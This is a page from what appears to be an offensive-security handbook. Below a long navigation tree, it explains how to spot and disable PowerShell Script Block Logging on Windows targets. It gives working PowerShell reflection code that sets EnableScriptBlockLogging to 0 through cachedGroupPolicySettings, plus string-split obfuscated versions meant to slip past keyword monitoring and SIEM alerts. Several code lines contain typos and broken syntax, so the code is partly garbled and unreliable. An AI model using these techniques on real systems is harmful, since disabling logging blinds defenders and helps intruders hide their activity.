🔴
Hacking
  • 1. Hacking Infrastructure
    • Infra Planification
      • Infrastructure Diagram & Requirements
    • Infra Configuration
      • Attack Server
      • C2 Server
      • Redirector
      • Payload Server
      • Phishing Server
  • 2. Reconnaissance and Information Gathering
    • OSINT (Open-Source Intelligence)
      • Enviroment
      • Android Virtualization
      • Web Browsers
      • Sock Puppets (Covert Accounts)
      • All-purpose Advanced Tools
      • Search Engines
      • People Search Engines
      • Websites & Domains
      • IP Addresses
      • Users & Emails
      • Social Media
      • Documents
      • Images
      • Videos & Lives
      • Metadata
      • Telephone Numbers
      • Online Maps
      • Virtual Currencies
      • Leaks, Breaches, Logs and Ransomware
      • Government & Business Records
    • Port, Version, Vuln Scanning
      • Nmap
      • Shodan
      • Network Mapping
      • Researching Potential Vulnerabilities
      • Dark Web Scanning
  • 3. Social Engeniering
    • Phising
      • Recycling Domains
      • Header Manipulation
      • Email Creation and Delivery
      • Email Spoofing & Warning Disabling
      • Site Building
      • Evilginx
      • Payload Hosting Obfuscation
      • Diverting the Analysts
      • VBA Macros & RTI
      • HTML Smuggling & HTA Files
      • JS Files
      • Other File Types
    • SMS Spoofing
      • SMSpubli
    • Social Engineering Toolkit (SET)
      • SET Installation
  • 4. Exploitation
    • Password Cracking
      • SetUp
      • Wordlist Building
      • Tools
    • Payloads - File Transfer - Coding - MalDev - ExploitDev
      • Payload Triggering
        • Shell File Transfer
        • PS Execution - Donwload Craddles
      • Normal Shells
        • Reverse Shells vs Bind Shells
        • Direct Reverse Shell Commands
        • Interactive Shell
        • Normal Reverse Shell Tools
        • PHP Webshells
        • ASPX Webshells
        • Kraken Webshell
        • Python Webshells
      • Coding Basics
        • Bash
        • Python
        • C
        • C++
        • C#
        • x86-64 (Intel) Assembly - NASM & MASM
      • Windows MalDev
        • MDLC & Tools
        • Architecture, Memory Management, APIs & Processes
        • PEs & DLLs
        • Malware Binary Signing & Metadata Modification
        • Payload Placement
        • Payload Execution Control
        • Payload Encryption & Obfuscation
        • Malware Optimization: Entropy Reduction & Compile Settings
        • Local Payload Execution
        • Process Enum, Injection & Hollowing
        • Payload Staging
        • Thread Hijacking
        • APC Injection
        • Callback Code Execution
        • Mapping Injection
        • Function Stomping Injection
        • PPID Spoofing
        • Process Argument Spoofing
        • API Hooking
        • String Hashing
        • IAT Hiding, Obfuscation & Camouflage
        • Anti-Debugging
        • Anti-Virtualization
        • Syscalls
        • NTDLL Refreshing
      • Windows ExploitDev
        • Tools
        • x86 Vanilla Stack BOF
      • Linux ExploitDev
        • BOF GNU/Linux 32-bit
    • Active Directory
      • Host and Domain Recon
        • SMB (139,445) Enum
        • RPC (135, 1024-5000) Enum
        • LDAP (389,636,3268,3269) Enum
        • PowerView
        • Other tools / Commands
        • BloodHound
      • Attacks and procedures
        • Password Spraying
        • User Impersonation
        • Lateral Movement
        • Kerberos (88)
        • Certificate Services (AD CS)
        • ACLs/ACEs
        • Group Policy
        • MS SQL Servers
        • LAPS (Local Administrator Password Solution)
        • Microsoft Configuration Manager
        • Domain Dominance
        • Forest & Domain Trusts
        • MiTM & Relaying Attack
    • Cloud
      • Azure
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Persistence
        • Data Exfiltration
      • AWS
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation
        • Lateral Movement
        • Post-Exp & Persistence
        • Data Exfiltration
      • Google Cloud
        • Basic Info
        • Initial Access
        • Enumeration
        • Privilege Escalation & Lateral Movement
        • Credential Access
        • Data Exfiltration
    • Web
      • Fingerprinting
      • Automated Scanners
      • Proxies
        • WAFs & Attack Obfuscation
        • HTTP Request Smuggling
      • CMS's: Content Management Systems
      • Authentication
        • Authentication vulnerabilities
        • OAuth 2.0 Authentication Vulnerabilities
        • Access Control
      • Files
        • File Upload
      • Reflected Values
        • Command Injection
        • HTML & XSS Injection
        • SSRF: Server-Side Request Forgery
        • SSTI: Server-Side Template Injection
        • CRLF Injection
        • CSV Injection
        • Openredirect
        • Prototype Pollution
        • ShellShock Attack
      • Search functionalities
        • LFI - RFI - Path traversal
        • SQL Injection
        • NoSQL injection
        • LDAP Injection
        • XPath Injection
      • Forms, WebSockets and PostMsgs
        • CSRF: Croos-Site Request Forgery
        • WebSocket Attacks
      • HTTP Headers
        • Clickjacking
        • CORS
        • Host Header Injection
      • Structured objects - Specific functionalities
        • XML External Entity (XXE) Injection
        • Deserialization Attacks
        • Padding Oracle Attack
      • Whitebox
        • Source Code Recovery, Analysis & Debugging
        • Python PoC Building
        • File Upload
        • SQL Injection
        • JavaScript Injection
        • SSTI (Server-Side Template Injection)
        • PHP Type Juggling
        • Prototype Pollution
        • Password Reset Attacks
    • Network Services
      • FTP 21
      • SSH 22
      • DNS 53,5353
      • FINGER 79
      • POP3 110,995
      • SNMP 161,162,10161,10162
      • MYSQL 3306
      • VNC 5800,5801,5900,5901
      • Ansible
      • Artifactory (8081)
      • Citrix
    • Wireless Pentesting
      • Wireless Reconnaissance
      • Wifite
      • RogueAP
      • WiFi Pineapple Mark VII
    • Camera Pentesting
      • Identifying Unsecured Web Cams
      • Default Passwords
      • Cameraradar
    • SCADA/ICS
      • Reconnaissance
      • Metasploit Modbus
      • modbus-cli
    • Mobile Pentesting
      • Enviroment SetUp
      • Android Pentest
      • iOS Pentest
  • 5. Privesc and Post-explotation
    • Linux Privilege Escalation
      • Manual Testing Elevation of privileges
      • Enumeration Commands
      • Enumeration Scripts
      • Looting for passwords & Interesting Information
      • Writable Files
      • SUDO
      • SSH Key
      • Scheduled tasks
      • SUID
      • Capbilities
      • NFS Root Squashing (Network File Sharing)
      • Shared Library
      • Docker Breakeout
      • Hijack TMUX session
      • Wildcard
      • Kernel Exploits
    • Linux Post-Explotation
      • SSH Backdoor
      • Manual Backdoors
      • Pillaging/Data Harvesting
    • Windows Privilege Escalation
      • Enumeration Scripts
      • Manual Enumeration
      • Metasploit tools
      • Processes Enumeration and Tasks
      • Incorrect permissions in services
      • Unquoted Service Paths
      • Insecure GUI Apps
      • Autorun
      • AlwaysInstallElevated
      • $PATH Interception
      • Looting for passwords
      • Runas
      • Impersonation Privileges
      • From local administrator to NT SYSTEM
      • Common Vulnerabilities and Exposure (CVE)
      • Kernel Exploitation
      • Named Pipes
      • Vulnerable Drivers
      • Abusing Shadow Copies
    • Windows Post-Explotation
      • Credential Theft
      • RDP Hijacking
      • Session Spying
      • WDigest
      • User backdoor
      • Manual Backdoors
      • SharPersist
      • WMI Event Subscriptions Persistance
      • Hunting for COM Hijacks
      • Mail Harvesting
    • Data Exfiltration
  • 6. Evasion Techniques
    • Linux - Evasion Techniques
    • Windows - Evasion Techniques
      • Detection Mechanisms & Evasion Techniques
      • Microsoft Defender Antivirus
      • AMSI & UAC Bypasses
      • AppLocker and Powershell CLM
      • PowerShell Script Block Logging
      • MDE (Microsoft Defender for Endpoint)
      • Altered scripts & Automations
      • Command Reimplementation C#/C
      • EDR Killing
  • 7. Tunneling
    • Port Forwarding
      • SSH Port Forwarding
      • Chisel Port Forwarding
      • Metasploit SSH Port Forwarding
    • Pivoting
      • Linux Tools & Methedology
      • Windows Tools
      • SSH Pivoting
    • C2 (Command and Control)
      • Cobalt Strike
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Attacks
        • Beacon Commands
        • Session Passing
        • Maleable Profiles
        • Artifact Kit
        • Resource Kit
        • Behavioural Detections
        • Aggressor Scripts
        • Beacon Object Files (BOFs)
        • NTLM Relaying Methodology w/ Cobalt
      • Metasploit
        • Schema Cheat Sheet
        • Staged vs Non-Staged Payloads
        • Metasploit Options
        • Start MSF DB (Kali)
        • Listeners
        • Meterpreter Commands
        • Pivoting
        • Meterpreter Pass a Shell
        • Msfvenom Payloads
        • Meterpreter Pillaging/Data Harvesting
      • Havoc
        • Set Up and Team Server
        • Listeners
        • Payloads
        • Deamon Commands
      • Empire
      • Custom C2s
        • HTTP mini C2
  • 8. Profesional Reports
    • LaTeX
      • Tools
      • Variable Config
      • Template definition & PDF Preview
      • Commands
      • Pentest Report Template
    • Documentation Tools
      • Note-Taking
      • Advanced Text Editors
      • Appendix
      • Quality and Diversity of Sources
      • Document Sanitization
    • Report Anatomy
      • OSINT Report Anatomy
Powered by GitBook
On this page
  1. 6. Evasion Techniques
  2. Windows - Evasion Techniques

PowerShell Script Block Logging

- Identify

From GPO Report (gpresult -h gpo.html in PowerView section) we notice that PowerShell Script Block Logging is turned on. Logs are rarely centralized to a single location. We can see this by searching the process list (extracted prevously, PowerView section) for processses related to things like audit and policy:

grep -Ei "log|audit|policy" process_list.txt

- Neutering

[console]

[Console]::WriteLine("static method WriteLine")

[ref].Assembly

[ref].Assembly.GetType('System.Management.Automation.Utils')

$dict = $utils.GetField("cachedGroupPolicySettings", "NonPublic,Static")

$dict

$dict.getValue("")

There we can spot EnableScriptBlockLogging set to 1, a key we must change to 0.

$key = "HKEY_LOCAL _MACHINE\Software\Policies\Microsoft \Windows\PowerShell\ScriptBlockLogging"

$scriptBlockLogging = $dict.getValue("")[$key]

$scriptBlockLogging['EnableScriptBlockLogging'] = 0

- Bypass String Matches

When executing this script on the target machine, we need not worry about ATA, since these commands do not involve any network communication with the domain controller. ORadar, on the other hand, still poses a real threat. This bypass command line is executed right before Script Block Logging is disabled, which means that it will inevitably be logged as a Warning under event 4104.

So we need to apply obfuscation techniques to bypass keyword monitoring:

$utils = [ref].Assembly.GetType('System.Management.Automation.Utils')

$dict = $utils. ("Ge"+"t`F`ield")('cachedGroupPolicySettings', 'NonP' +'ublic,Static')

$key = "HKEY LOCAL MACHINE\ Software Policies \Microsoft\ Windows \PowerShell\ScriptBl"+"ockLogging"

$dict-getValue("")[$key]['EnableS'+'criptBlockLogging'] = 0

In some Windows machines, the EnableScriptBlockLogging dictionary key is not found in cacheGroupPolicySettings even though is enabled, in this case, the alternative payload becomes:

$GPF = [ref].Assembly.GetType('System.Management .Automation.Utils').

"GetF`Ield" ('cachedGroupPolicySettings', 'NonP'+'ublic,Static')

$GPS = $GPF.GetValue($null)

# Create a new Dictionary object

$val = [System.Collections.Generic.Dictionary[string, System.Object]]: :new()

# Populate the dictionary

$val.Add('EnableScriptB'+'lockLogging',0)

Sval.Add('EnableScriptB'+'lockInvocationLogging', 0)

$GPS[ 'HKEY LOCAL MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging'] = $val

PreviousAppLocker and Powershell CLMNextMDE (Microsoft Defender for Endpoint)

Last updated 1 year ago